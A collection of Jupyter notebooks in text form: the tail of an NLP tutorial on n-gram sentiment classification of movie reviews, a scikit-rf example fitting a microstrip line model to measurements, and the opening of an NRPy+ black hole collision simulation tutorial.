decade', 'The lion is an endangered species'] # + # Create CountVectorizer object vectorizer = CountVectorizer() # Generate matrix of word vectors bow_matrix = vectorizer.fit_transform(sentences) # Convert bow_matrix into a DataFrame bow_df = pd.DataFrame(bow_matrix.toarray()) # Map the column names to vocabulary bow_df.columns = vectorizer.get_feature_names() # Print bow_df bow_df # - # Observe that the column names refer to the token whose frequency is being recorded. Therefore, since the first column name is an, the first feature represents the number of times the word `'an'` occurs in a particular sentence. 
`get_feature_names()` essentially gives us a list which represents the mapping of the feature indices to the feature name in the vocabulary. # ## Building a BoW Naive Bayes classifier # - Steps # 1. Text preprocessing # 2. Building a bag-of-words model (or representation) # 3. Machine Learning # ### BoW vectors for movie reviews # n this exercise, you have been given two pandas Series, `X_train` and `X_test`, which consist of movie reviews. They represent the training and the test review data respectively. Your task is to preprocess the reviews and generate BoW vectors for these two sets using `CountVectorizer`. # # Once we have generated the BoW vector matrices `X_train_bow` and `X_test_bow`, we will be in a very good position to apply a machine learning model to it and conduct sentiment analysis. movie_reviews = pd.read_csv('./dataset/movie_reviews_clean.csv') movie_reviews.head() X = movie_reviews['review'] y = movie_reviews['sentiment'] # + from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25) # + # Create a CounterVectorizer object vectorizer = CountVectorizer(lowercase=True, stop_words='english') # fit and transform X_train X_train_bow = vectorizer.fit_transform(X_train) # Transform X_test X_test_bow = vectorizer.transform(X_test) # Print shape of X_train_bow and X_test_bow print(X_train_bow.shape) print(X_test_bow.shape) # - # You now have a good idea of preprocessing text and transforming them into their bag-of-words representation using `CountVectorizer`. In this exercise, you have set the lowercase argument to True. However, note that this is the default value of lowercase and passing it explicitly is not necessary. Also, note that both `X_train_bow` and `X_test_bow` have 7822 features. There were words present in `X_test` that were not in `X_train`. CountVectorizer chose to ignore them in order to ensure that the dimensions of both sets remain the same. 
# ### Predicting the sentiment of a movie review # n the previous exercise, you generated the bag-of-words representations for the training and test movie review data. In this exercise, we will use this model to train a Naive Bayes classifier that can detect the sentiment of a movie review and compute its accuracy. Note that since this is a binary classification problem, the model is only capable of classifying a review as either positive (1) or negative (0). It is incapable of detecting neutral reviews. # + from sklearn.naive_bayes import MultinomialNB # Create a MultinomialNB object clf = MultinomialNB() # Fit the classifier clf.fit(X_train_bow, y_train) # Measure the accuracy accuracy = clf.score(X_test_bow, y_test) print("The accuracy of the classifier on the test set is %.3f" % accuracy) # Predict the sentiment of a negative review review = 'The movie was terrible. The music was underwhelming and the acting mediocre.' prediction = clf.predict(vectorizer.transform([review]))[0] print("The sentiment predicted by the classifier is %i" % (prediction)) # - # You have successfully performed basic sentiment analysis. Note that the accuracy of the classifier is 80%. Considering the fact that it was trained on only 750 reviews, this is reasonably good performance. The classifier also correctly predicts the sentiment of a mini negative review which we passed into it. # ## Building n-gram models # - BoW shortcomings # - Example # - `The movie was good and not boring` -> positive # - `The movie was not good and boring` -> negative # - Exactly the same BoW representation! # - Context of the words is lost. # - Sentiment dependent on the position of `not` # - n-grams # - Contiguous sequence of n elements (or words) in a given document. 
# - Bi-grams / Tri-grams # - n-grams Shortcomings # - Increase number of dimension, occurs curse of dimensionality # - Higher order n-grams are rare # ### n-gram models for movie tag lines # In this exercise, we have been provided with a corpus of more than 9000 movie tag lines. Our job is to generate n-gram models up to n equal to 1, n equal to 2 and n equal to 3 for this data and discover the number of features for each model. # # We will then compare the number of features generated for each model. # + # Generate n-grams upto n=1 vectorizer_ng1 = CountVectorizer(ngram_range=(1, 1)) ng1 = vectorizer_ng1.fit_transform(corpus) # Generate n-grams upto n=2 vectorizer_ng2 = CountVectorizer(ngram_range=(1, 2)) ng2 = vectorizer_ng2.fit_transform(corpus) # Generate n-grams upto n=3 vectorizer_ng3 = CountVectorizer(ngram_range=(1, 3)) ng3 = vectorizer_ng3.fit_transform(corpus) # Print the number of features for each model print("ng1, ng2 and ng3 have %i, %i and %i features respectively" % (ng1.shape[1], ng2.shape[1], ng3.shape[1])) # - # You now know how to generate n-gram models containing higher order n-grams. Notice that `ng2` has over 37,000 features whereas `ng3` has over 76,000 features. This is much greater than the 6,000 dimensions obtained for `ng1`. As the n-gram range increases, so does the number of features, leading to increased computational costs and a problem known as the curse of dimensionality. # ### Higher order n-grams for sentiment analysis # Similar to a previous exercise, we are going to build a classifier that can detect if the review of a particular movie is positive or negative. However, this time, we will use n-grams up to n=2 for the task. 
ng_vectorizer = CountVectorizer(ngram_range=(1, 2)) X_train_ng = ng_vectorizer.fit_transform(X_train) X_test_ng = ng_vectorizer.transform(X_test) # + # Define an instance of MultinomialNB clf_ng = MultinomialNB() # Fit the classifier clf_ng.fit(X_train_ng, y_train) # Measure the accuracy accuracy = clf_ng.score(X_test_ng, y_test) print("The accuracy of the classifier on the test set is %.3f" % accuracy) # Predict the sentiment of a negative review review = 'The movie was not good. The plot had several holes and the acting lacked panache' prediction = clf_ng.predict(ng_vectorizer.transform([review]))[0] print("The sentiment predicted by the classifier is %i" % (prediction)) # - # Notice how this classifier performs slightly better than the BoW version. Also, it succeeds at correctly identifying the sentiment of the mini-review as negative. # ### Comparing performance of n-gram models # You now know how to conduct sentiment analysis by converting text into various n-gram representations and feeding them to a classifier. In this exercise, we will conduct sentiment analysis for the same movie reviews from before using two n-gram models: unigrams and n-grams upto n equal to 3. # # We will then compare the performance using three criteria: accuracy of the model on the test set, time taken to execute the program and the number of features created when generating the n-gram representation. # + import time start_time = time.time() # Splitting the data into training and test sets train_X, test_X, train_y, test_y = train_test_split(movie_reviews['review'], movie_reviews['sentiment'], test_size=0.5, random_state=42, stratify=movie_reviews['sentiment']) # Generateing ngrams vectorizer = CountVectorizer(ngram_range=(1,1)) train_X = vectorizer.fit_transform(train_X) test_X = vectorizer.transform(test_X) # Fit classifier clf = MultinomialNB() clf.fit(train_X, train_y) # Print the accuracy, time and number of dimensions print("The program took %.3f seconds to complete. 
The accuracy on the test set is %.2f. " % (time.time() - start_time, clf.score(test_X, test_y))) print("The ngram representation had %i features." % (train_X.shape[1])) # + start_time = time.time() # Splitting the data into training and test sets train_X, test_X, train_y, test_y = train_test_split(movie_reviews['review'], movie_reviews['sentiment'], test_size=0.5, random_state=42, stratify=movie_reviews['sentiment']) # Generateing ngrams vectorizer = CountVectorizer(ngram_range=(1,3)) train_X = vectorizer.fit_transform(train_X) test_X = vectorizer.transform(test_X) # Fit classifier clf = MultinomialNB() clf.fit(train_X, train_y) # Print the accuracy, time and number of dimensions print("The program took %.3f seconds to complete. The accuracy on the test set is %.2f. " % (time.time() - start_time, clf.score(test_X, test_y))) print("The ngram representation had %i features." % (train_X.shape[1])) # - # The program took around 0.2 seconds in the case of the unigram model and more than 10 times longer for the higher order n-gram model. The unigram model had over 12,000 features whereas the n-gram model for upto n=3 had over 178,000! Despite taking higher computation time and generating more features, the classifier only performs marginally better in the latter case, producing an accuracy of 77% in comparison to the 75% for the unigram model.
_notebooks/2020-07-17-03-N-Gram-models.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Correlating microstripline model to measurement # # ## Target # # The aim of this example is to correlate the microstripline model to the measurement over 4 frequency decades from 1MHz to 5GHz. # # ## Plan # # 1. Two different lengths of microstripline are measured; # 2. Multiline method is used to compute the frequency dependant relative permittivity and loss angle of the dielectric; # 3. Microstripline model is fitted to the computed parameters by optimization; # 4. Checking the results by embedding the connectors and comparison against measurement; # + # %load_ext autoreload # %autoreload 2 import skrf as rf import numpy as np from numpy import real, log10, sum, absolute, pi, sqrt import matplotlib.pyplot as plt from scipy.optimize import minimize, differential_evolution rf.stylely() # - # ## Measurement of two microstripline with different lenght # The measurement where performed the 21th March 2017 on a Anritsu MS46524B 20GHz Vector Network Analyser. The setup is a linear frequency sweep from 1MHz to 10GHz with 10'000 points. Output power is 0dBm, IF bandwidth is 1kHz and neither averaging nor smoothing are used. # # The frequency range of interest is limited from 1MHz to 5GHz, but the measurement are up to 10GHz. # # MSLxxx is a L long, W wide, T thick copper microstripline on a H height substrate with bottom ground plane. # # | Name | L (mm) | W (mm) | H (mm) | T (um) | Substrate | # | :--- | ---: | ---: | ---: | ---: | :--- | # | MSL100 | 100 | 3.00 | 1.55 | 50 | FR-4 | # | MSL200 | 200 | 3.00 | 1.55 | 50 | FR-4 | # # The milling of the artwork is performed mechanically with a lateral wall of 45°. 
A small top ground plane chunk connected by a vias array to bottom ground is provided to solder the connector top ground legs and provide some coplanar-like transition from coax to microstrip. # # The relative permittivity of the dielectric was assumed to be approximatively 4.5 for design purpose. # # ![MSL100 and MSL200 iillustaration, both are microstripline, MSL200 is twice the length of MSL100](MSL_CPWG_100_200.jpg "MSL100 and MSL200") # + # Load raw measurements MSL100_raw = rf.Network('MSL100.s2p') MSL200_raw = rf.Network('MSL200.s2p') # Keep only the data from 1MHz to 5GHz MSL100 = MSL100_raw['1-5000mhz'] MSL200 = MSL200_raw['1-5000mhz'] plt.figure() plt.title('Measured data') MSL100.plot_s_db() MSL200.plot_s_db() plt.show() # - # The measured data shows that the electrical length of MSL200 is approximatively twice the one of MSL100. The frequency spacing between Return Loss dips is aproximatively the half for MSL200 compared to MSL100. This is coherent with the physical dimensions if the small connector length is neglected. # # The MSL200 Insertion Loss is also about twice than MSL100, which is coherent as a longer path bring more attenuation. # # Return Loss under -20dB is usually considered to be fair for microstripline, it correspond to 1% of the power being reflected. # ## Dielectric effective relative permittivity extraction by multiline method # The phase of the measurements transmission parameter are subtracted. Because connectors are present on both DUTs, their lenght effect is canceled and the remaining phase difference is related to the difference of the DUTs length. # # Knowing the physical length $\Delta L$ and the phase $\Delta \phi$, the effective relative permittivity constant $\epsilon_{r,eff}$ can be computed from the relation # $$\left\{ \begin{array}{ll} # \lambda = \frac{c_0}{f \cdot \sqrt{\epsilon_{r,eff}}} \\ # \phi = \frac{2\pi L}{\lambda} # \end{array} \right. 
\implies # \epsilon_{r,eff} = \left( \frac{\Delta \phi \cdot c_0}{2 \pi f \cdot \Delta L} \right)^2 $$ # # In the same idea, the difference of Insertion Loss of the two DUT gives the Insertion Loss of the difference of the length and cancel connectors effects. # + c0 = 3e8 f = MSL100.f deltaL = 0.1 deltaPhi = np.unwrap(np.angle(MSL100.s[:,1,0])) - np.unwrap(np.angle(MSL200.s[:,1,0])) Er_eff = np.power(deltaPhi * c0 / (2 * np.pi * f * deltaL), 2) Loss_mea = 20 * log10(absolute(MSL200.s[:,1,0] / MSL100.s[:,1,0])) plt.figure() plt.suptitle('Effective relative permittivity and loss') plt.subplot(2,1,1) plt.plot(f * 1e-9, Er_eff) plt.ylabel('$\epsilon_{r,eff}$') plt.subplot(2,1,2) plt.plot(f * 1e-9, Loss_mea) plt.xlabel('Frequency (GHz)') plt.ylabel('Insertion Loss (dB)') plt.show() # - # The effective relative permittivity of the geometry shows a dispersion effect at low frequency which can be modelled by a wideband Debye model such as *Djordjevic/Svensson* implementation of skrf microstripline media. The value then increase slowly with frequency which correspond roughly to the *Kirschning and Jansen* dispersion model. # # The Insertion Loss seems proportionnal to frequency, which indicate a predominance of the dielectric losses. Conductor losses are related to the square-root of frequency. Radiation losses are neglected. # ## Fit microstripline model to the computed parameters by optimization # # ### Effective relative permittivity # Microstrip media model with the physical dimensions of the measured microstriplines is fitted to the computed $\epsilon_{r,eff}$ by optimization of $\epsilon_r$ and tand of the substrate at 1GHz. The dispersion model used to account for frequency variation of the parameters are *Djordjevic/Svensson* and *Kirschning and Jansen*. 
# +
from skrf.media import MLine

# Microstripline physical dimensions (see measurement table above), in metres.
W = 3.00e-3
H = 1.51e-3  # NOTE(review): the measurement table above lists H = 1.55 mm -- confirm which substrate height is correct
T = 50e-6
L = 0.1
# Optimizer starting point: substrate parameters at the f_epr_tand reference frequency.
Er0 = 4.5
tand0 = 0.02
f_epr_tand = 1e9
x0 = [Er0, tand0]

def model(x, freq, Er_eff, L, W, H, T, f_epr_tand, Loss_mea):
    """Cost function for fitting the substrate parameters of the microstrip model.

    Parameters
    ----------
    x : sequence of two floats
        [ep_r, tand] of the substrate, specified at ``f_epr_tand``.
    freq : skrf.Frequency
        Frequency axis of the measurement.
    Er_eff : array
        Effective relative permittivity extracted from the measurements.
    L, W, H, T : float
        Line length, trace width, substrate height and conductor thickness (m).
    f_epr_tand : float
        Reference frequency (Hz) at which ep_r and tand are defined.
    Loss_mea : array
        Measured insertion loss (dB) of the de-embedded line.

    Returns
    -------
    float
        Weighted sum of squared errors between model and measurement.
    """
    ep_r = x[0]
    tand = x[1]
    m = MLine(frequency=freq, z0=50, w=W, h=H, t=T,
              ep_r=ep_r, mu_r=1, rho=1.712e-8, tand=tand, rough=0.15e-6,
              f_low=1e3, f_high=1e12, f_epr_tand=f_epr_tand,
              diel='djordjevicsvensson', disp='kirschningjansen')
    DUT = m.line(L, 'm', embed=True, z0=m.Z0_f)
    Loss_mod = 20 * log10(absolute(DUT.s[:,1,0]))
    # The loss term is down-weighted (x0.01) so the fit is driven mainly by ep_reff.
    return sum((real(m.ep_reff_f) - Er_eff)**2) + 0.01*sum((Loss_mod - Loss_mea)**2)

res = minimize(model, x0,
               args=(MSL100.frequency, Er_eff, L, W, H, T, f_epr_tand, Loss_mea),
               bounds=[(4.2, 4.7), (0.001, 0.1)])

Er = res.x[0]
tand = res.x[1]
print('Er={:.3f}, tand={:.4f} at {:.1f} GHz.'.format(Er, tand, f_epr_tand * 1e-9))
# -

# As a sanity check, the model data are compared with the computed parameters

# +
m = MLine(frequency=MSL100.frequency, z0=50, w=W, h=H, t=T,
          ep_r=Er, mu_r=1, rho=1.712e-8, tand=tand, rough=0.15e-6,
          f_low=1e3, f_high=1e12, f_epr_tand=f_epr_tand,
          diel='djordjevicsvensson', disp='kirschningjansen')
DUT = m.line(L, 'm', embed=True, z0=m.Z0_f)
DUT.name = 'DUT'
Loss_mod = 20 * log10(absolute(DUT.s[:,1,0]))

plt.figure()
plt.suptitle('Measurement vs Model')
plt.subplot(2,1,1)
plt.plot(f * 1e-9, Er_eff, label='Measured')
plt.plot(f * 1e-9, real(m.ep_reff_f), label='Model')
plt.ylabel(r'$\epsilon_{r,eff}$')  # raw string: '\e' is not a valid string escape
plt.legend()
plt.subplot(2,1,2)
plt.plot(f * 1e-9, Loss_mea, label='Measured')
plt.plot(f * 1e-9, Loss_mod, label='Model')
plt.xlabel('Frequency (GHz)')
plt.ylabel('Insertion Loss (dB)')
plt.legend()
plt.show()
# -

# The model results show a reasonable agreement with the measured $\epsilon_{r,eff}$ and Insertion Loss values.

# ## Checking the results
#
# If the model is now plotted against the measurement of the same length, the plot shows no agreement. This is because the connector effects are not captured by the model.
plt.figure()
plt.title('Measured vs modelled data')
MSL100.plot_s_db()
DUT.plot_s_db(0, 0, color='k')
DUT.plot_s_db(1, 0, color='k')
plt.show()

# ### Connector delay and loss estimation
#
# The delay of the connector is estimated by fitting a line to its phase contribution vs frequency.
#
# The phase and loss of the two connectors are computed by subtracting the phase and loss computed without the connectors from the measurement of the same length.

# +
# Connector phase contribution: measured MSL100 phase minus the phase of the bare
# 100 mm line (deltaPhi was derived earlier from the MSL100/MSL200 difference).
phi_conn = np.unwrap(np.angle(MSL100.s[:,1,0])) + deltaPhi
# Linear fit of phase vs frequency; the slope gives the two-connector group delay,
# halved for a single connector.
z = np.polyfit(f, phi_conn, 1)
delay = -z[0]/(2*np.pi)/2
print('Connector delay: {:.0f} ps'.format(delay * 1e12))

# Connector insertion loss: measured loss minus the de-embedded line loss.
loss_conn_db = 20 * log10(absolute(MSL100.s[:,1,0])) - Loss_mea

# Simple connector model: sqrt(f) conductor-like attenuation plus an ideal delay
# line; 'left' and 'right' are the two mirrored connectors.
alpha = 1.6*np.log(10)/20 * np.sqrt(f/1e9)
beta = 2*np.pi*f/c0
gamma = alpha + 1j*beta
mf = rf.media.DefinedGammaZ0(m.frequency, z0=50, gamma=gamma)
left = mf.line(delay*1e9, 'ns', embed=True, z0=53.2)
right = left.flipped()
check = left ** right

plt.figure()
plt.suptitle('Connector effects')
plt.subplot(2,1,1)
plt.plot(f * 1e-9, phi_conn, label='measured')
plt.plot(f * 1e-9, np.unwrap(np.angle(check.s[:,1,0])), label='model')
plt.ylabel('phase (rad)')
plt.legend()
plt.subplot(2,1,2)
plt.plot(f * 1e-9, loss_conn_db, label='Measured')
plt.plot(f * 1e-9, 20*np.log10(np.absolute(check.s[:,1,0])), label='model')
plt.xlabel('Frequency (GHz)')
plt.ylabel('Insertion Loss (dB)')
plt.legend()
plt.show()
# -

# The phase of the model shows a good agreement, while the Insertion Loss shows a reasonable agreement and is small in any case.

# ### Connector impedance adjustment by time-domain reflectometry
#
# Time-domain step responses of measurement and model are used to adjust the connector model characteristic impedance.
#
# The plots show the connector having an inductive behaviour (positive peak) and the microstripline being a bit too much capacitive (negative plateau).
#
# Characteristic impedance of the connector is tuned by trial-and-error until a reasonable agreement is achieved. Optimization could have been used instead.
#
#

# +
# Assemble the complete model: connector + microstripline + connector.
full_model = left ** DUT ** right

# Step responses require the S-parameters to be extrapolated down to DC.
measured_dc = MSL100.extrapolate_to_dc(kind='linear')
modelled_dc = full_model.extrapolate_to_dc(kind='linear')

plt.figure()
plt.suptitle('Left-right and right-left TDR')
plt.subplot(2,1,1)
measured_dc.s11.plot_s_time_step(pad=2000, window='hamming', label='Measured L-R')
modelled_dc.s11.plot_s_time_step(pad=2000, window='hamming', label='Model L-R')
plt.xlim(-2, 4)
plt.subplot(2,1,2)
measured_dc.s22.plot_s_time_step(pad=2000, window='hamming', label='Measured R-L')
modelled_dc.s22.plot_s_time_step(pad=2000, window='hamming', label='Model R-L')
plt.xlim(-2, 4)
plt.tight_layout()
plt.show()
# -

# ### Final comparison

# +
plt.figure()
plt.title('Measured vs modelled data')
MSL100.plot_s_db()
full_model.name = 'Model'
full_model.plot_s_db(0, 0, color='k')
full_model.plot_s_db(1, 0, color='k')
plt.show()
# -

# The plot shows a decent agreement between the model and the measured data. The model is a good representation of the DUT between 1MHz and 5 GHz.
#
# At higher frequency, the model begins to deviate from the measurement. The model does not capture effects such as radiation loss or complex copper roughness. Smaller geometries such as the top ground plane chunk may also begin to contribute as they become electrically long with the increase of frequency.
#
# As a comparison, the 5GHz wavelength is 60mm in the air and the MSL100 line is 100mm long. The DUT itself is electrically long above some GHz.
#
doc/source/examples/networktheory/Correlating microstripline model to measurement.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # <script async src="https://www.googletagmanager.com/gtag/js?id=UA-59152712-8"></script> # <script> # window.dataLayer = window.dataLayer || []; # function gtag(){dataLayer.push(arguments);} # gtag('js', new Date()); # # gtag('config', 'UA-59152712-8'); # </script> # # # Start-to-Finish Example: Head-On Black Hole Collision with Gravitational Wave Analysis # # ## Author: <NAME> # ### Formatting improvements courtesy <NAME> # # ## This module implements a basic numerical relativity code to merge two black holes in *spherical coordinates*, as well as the gravitational wave analysis provided by the $\psi_4$ NRPy+ tutorial notebooks ([$\psi_4$](Tutorial-Psi4.ipynb) & [$\psi_4$ tetrad](Tutorial-Psi4_tetrads.ipynb)). # # ### Here we place the black holes initially on the $z$-axis, so the entire simulation is axisymmetric about the $\phi$-axis. Not sampling in the $\phi$ direction greatly speeds up the simulation. # # **Module Status:** <font color='green'><b> Validated </b></font> # # **Validation Notes:** This module has been validated to exhibit convergence to zero of the Hamiltonian constraint violation at the expected order to the exact solution *after a short numerical evolution of the initial data* (see [plot](#convergence) at bottom), and results have been validated to agree to roundoff error with the [original SENR code](https://bitbucket.org/zach_etienne/nrpy). # # Further, agreement of $\psi_4$ with result expected from black hole perturbation theory (*a la* Fig 6 of [Ruchlin, Etienne, and Baumgarte](https://arxiv.org/pdf/1712.07658.pdf)) has been successfully demonstrated in [Step 7](#compare). # # ### NRPy+ Source Code for this module: # 1. 
[BSSN/BrillLindquist.py](../edit/BSSN/BrillLindquist.py); [\[**tutorial**\]](Tutorial-ADM_Initial_Data-Brill-Lindquist.ipynb): Brill-Lindquist initial data; sets all ADM variables in Cartesian basis: # 1. [BSSN/ADM_Exact_Spherical_or_Cartesian_to_BSSNCurvilinear.py](../edit/BSSN/ADM_Exact_Spherical_or_Cartesian_to_BSSNCurvilinear.py); [\[**tutorial**\]](Tutorial-ADM_Initial_Data-Converting_Exact_ADM_Spherical_or_Cartesian_to_BSSNCurvilinear.ipynb): Spherical/Cartesian ADM$\to$Curvilinear BSSN converter function, for which exact expressions are given for ADM quantities. # 1. [BSSN/BSSN_ID_function_string.py](../edit/BSSN/BSSN_ID_function_string.py): Sets up the C code string enabling initial data be set up in a point-by-point fashion # 1. [BSSN/BSSN_constraints.py](../edit/BSSN/BSSN_constraints.py); [\[**tutorial**\]](Tutorial-BSSN_constraints.ipynb): Hamiltonian constraint in BSSN curvilinear basis/coordinates # 1. [BSSN/BSSN_RHSs.py](../edit/BSSN/BSSN_RHSs.py); [\[**tutorial**\]](Tutorial-BSSN_time_evolution-BSSN_RHSs.ipynb): Generates the right-hand sides for the BSSN evolution equations in singular, curvilinear coordinates # 1. [BSSN/BSSN_gauge_RHSs.py](../edit/BSSN/BSSN_gauge_RHSs.py); [\[**tutorial**\]](Tutorial-BSSN_time_evolution-BSSN_gauge_RHSs.ipynb): Generates the right-hand sides for the BSSN gauge evolution equations in singular, curvilinear coordinates # # # ## Introduction: # Here we use NRPy+ to generate the C source code necessary to set up initial data for two black holes (Brill-Lindquist, [Brill & Lindquist, Phys. Rev. 131, 471, 1963](https://journals.aps.org/pr/abstract/10.1103/PhysRev.131.471); see also Eq. 1 of [Brandt & Brügmann, arXiv:gr-qc/9711015v1](https://arxiv.org/pdf/gr-qc/9711015v1.pdf)). 
Then we use it to generate the RHS expressions for [Method of Lines](https://reference.wolfram.com/language/tutorial/NDSolveMethodOfLines.html) time integration based on the [explicit Runge-Kutta fourth-order scheme](https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods) (RK4). # # The entire algorithm is outlined below, with NRPy+-based components highlighted in <font color='green'>green</font>. # # 1. Allocate memory for gridfunctions, including temporary storage for the RK4 time integration. # 1. ([Step 2 below](#adm_id)) <font color='green'>Set gridfunction values to initial data (**[documented in previous start-to-finish module](Tutorial-Start_to_Finish-BSSNCurvilinear-Setting_up_two_BH_initial_data.ipynb)**).</font> # 1. Evolve the initial data forward in time using RK4 time integration. At each RK4 substep, do the following: # 1. ([Step 3 below](#bssn_rhs)) <font color='green'>Evaluate BSSN RHS expressions.</font> # 1. ([Step 4 below](#apply_bcs)) Apply singular, curvilinear coordinate boundary conditions [*a la* the SENR/NRPy+ paper](https://arxiv.org/abs/1712.07658) # 1. ([Step 5 below](#enforce3metric)) <font color='green'>Enforce conformal 3-metric $\det{\bar{\gamma}_{ij}}=\det{\hat{\gamma}_{ij}}$ constraint</font> # 1. At the end of each iteration in time, output the <font color='green'>Hamiltonian constraint violation</font>. # 1. Repeat above steps at two numerical resolutions to confirm convergence to zero. # <a id='toc'></a> # # # Table of Contents # $$\label{toc}$$ # # This notebook is organized as follows # # 1. [Step 1](#initializenrpy): Set core NRPy+ parameters for numerical grids and reference metric # 1. [Step 2](#adm_id): Import Brill-Lindquist ADM initial data C function from the [BSSN.BrillLindquist](../edit/BSSN/BrillLindquist.py) NRPy+ module # 1. [Step 3](#nrpyccodes) Define Functions for Generating C Codes of Needed Quantities # 1. [Step 3.a](#bssnrhs): BSSN RHSs # 1. [Step 3.b](#hamconstraint): Hamiltonian constraint # 1. 
[Step 3.c](#spinweight): Computing $_{-2}Y_{\ell m} (\theta, \phi)$ for all $(\ell,m)$ for $\ell=0$ up to 2 # 1. [Step 3.d](#psi4): $\psi_4$ # 1. [Step 4](#ccodegen): Generate C codes in parallel # 1. [Step 5](#apply_bcs): Apply singular, curvilinear coordinate boundary conditions # 1. [Step 6](#enforce3metric): Enforce conformal 3-metric $\det{\bar{\gamma}_{ij}}=\det{\hat{\gamma}_{ij}}$ constraint # 1. [Step 7](#mainc): `BrillLindquist_Playground.c`: The Main C Code # 1. [Step 8](#compare): Comparison with black hole perturbation theory # 1. [Step 9](#visual): Data Visualization Animations # 1. [Step 9.a](#installdownload): Install `scipy` and download `ffmpeg` if they are not yet installed/downloaded # 1. [Step 9.b](#genimages): Generate images for visualization animation # 1. [Step 9.c](#genvideo): Generate visualization animation # 1. [Step 10](#convergence): Visualize the numerical error, and confirm that it converges to zero with increasing numerical resolution (sampling) # 1. [Step 11](#latex_pdf_output): Output this notebook to $\LaTeX$-formatted PDF file # <a id='initializenrpy'></a> # # # Step 1: Set core NRPy+ parameters for numerical grids and reference metric \[Back to [top](#toc)\] # $$\label{initializenrpy}$$ # + # First we import needed core NRPy+ modules from outputC import * import NRPy_param_funcs as par import grid as gri import loop as lp import indexedexp as ixp import finite_difference as fin import reference_metric as rfm #par.set_parval_from_str("outputC::PRECISION","long double") # Set spatial dimension (must be 3 for BSSN) DIM = 3 par.set_parval_from_str("grid::DIM",DIM) # Set some core parameter choices, including order of MoL timestepping, FD order, # floating point precision, and CFL factor: # Choices are: Euler, "RK2 Heun", "RK2 MP", "RK2 Ralston", RK3, "RK3 Heun", "RK3 Ralston", # SSPRK3, RK4, DP5, DP5alt, CK5, DP6, L6, DP8 RK_method = "RK4" FD_order = 10 # Even numbers only, starting with 2. 
12 is generally unstable REAL = "double" # Best to use double here. CFL_FACTOR= 0.5 # (GETS OVERWRITTEN WHEN EXECUTED.) In pure axisymmetry (symmetry_axes = 2 below) 1.0 works fine. Otherwise 0.5 or lower. # Generate timestepping code. As described above the Table of Contents, this is a 3-step process: # 3.A: Evaluate RHSs (RHS_string) # 3.B: Apply boundary conditions (post_RHS_string, pt 1) # 3.C: Enforce det(gammabar) = det(gammahat) constraint (post_RHS_string, pt 2) import MoLtimestepping.C_Code_Generation as MoL from MoLtimestepping.RK_Butcher_Table_Dictionary import Butcher_dict RK_order = Butcher_dict[RK_method][1] MoL.MoL_C_Code_Generation(RK_method, RHS_string = "rhs_eval(Nxx,Nxx_plus_2NGHOSTS,dxx, xx, RK_INPUT_GFS, RK_OUTPUT_GFS);", post_RHS_string = """ apply_bcs(Nxx, Nxx_plus_2NGHOSTS, bc_gz_map,bc_parity_conditions,NUM_EVOL_GFS,evol_gf_parity, RK_OUTPUT_GFS); enforce_detgammabar_constraint(Nxx_plus_2NGHOSTS, xx, RK_OUTPUT_GFS);\n""") # Set finite differencing order: par.set_parval_from_str("finite_difference::FD_CENTDERIVS_ORDER", FD_order) # REAL and CFL_FACTOR parameters used below in C code directly # Then we set the coordinate system for the numerical grid par.set_parval_from_str("reference_metric::CoordSystem","SinhSpherical") rfm.reference_metric() # Create ReU, ReDD needed for rescaling B-L initial data, generating BSSN RHSs, etc. # Set the finite-differencing order to 6, matching B-L test from REB paper (Pg 20 of https://arxiv.org/pdf/1712.07658.pdf) par.set_parval_from_str("finite_difference::FD_CENTDERIVS_ORDER",FD_order) # Then we set the phi axis to be the symmetry axis; i.e., axis "2", corresponding to the i2 direction. # This sets all spatial derivatives in the phi direction to zero. 
par.set_parval_from_str("indexedexp::symmetry_axes","2") ################# # Next output C headers related to the numerical grids we just set up: ################# # First output the coordinate bounds xxmin[] and xxmax[]: with open("BSSN/xxminmax.h", "w") as file: file.write("const REAL xxmin[3] = {"+str(rfm.xxmin[0])+","+str(rfm.xxmin[1])+","+str(rfm.xxmin[2])+"};\n") file.write("const REAL xxmax[3] = {"+str(rfm.xxmax[0])+","+str(rfm.xxmax[1])+","+str(rfm.xxmax[2])+"};\n") # Next output the proper distance between gridpoints in given coordinate system. # This is used to find the minimum timestep. dxx = ixp.declarerank1("dxx",DIM=3) ds_dirn = rfm.ds_dirn(dxx) outputC([ds_dirn[0],ds_dirn[1],ds_dirn[2]],["ds_dirn0","ds_dirn1","ds_dirn2"],"BSSN/ds_dirn.h") # Generic coordinate NRPy+ file output, Part 2: output the conversion from (x0,x1,x2) to Cartesian (x,y,z) outputC([rfm.xxCart[0],rfm.xxCart[1],rfm.xxCart[2]],["xCart[0]","xCart[1]","xCart[2]"], "BSSN/xxCart.h") # - # <a id='adm_id'></a> # # # Step 2: Import Brill-Lindquist ADM initial data C function from the [BSSN.BrillLindquist](../edit/BSSN/BrillLindquist.py) NRPy+ module \[Back to [top](#toc)\] # $$\label{adm_id}$$ # # The [BSSN.BrillLindquist](../edit/BSSN/BrillLindquist.py) NRPy+ module does the following: # # 1. Set up Brill-Lindquist initial data [ADM](https://en.wikipedia.org/wiki/ADM_formalism) quantities in the **Cartesian basis**, as [documented here](Tutorial-ADM_Initial_Data-Brill-Lindquist.ipynb). # 1. Convert the ADM **Cartesian quantities** to **BSSN quantities in the desired Curvilinear basis** (set by reference_metric::CoordSystem), as [documented here](Tutorial-ADM_Initial_Data-Converting_ADMCartesian_to_BSSNCurvilinear.ipynb). # 1. Sets up the standardized C function for setting all BSSN Curvilinear gridfunctions in a pointwise fashion, as [written here](../edit/BSSN/BSSN_ID_function_string.py), and returns the C function as a Python string. 
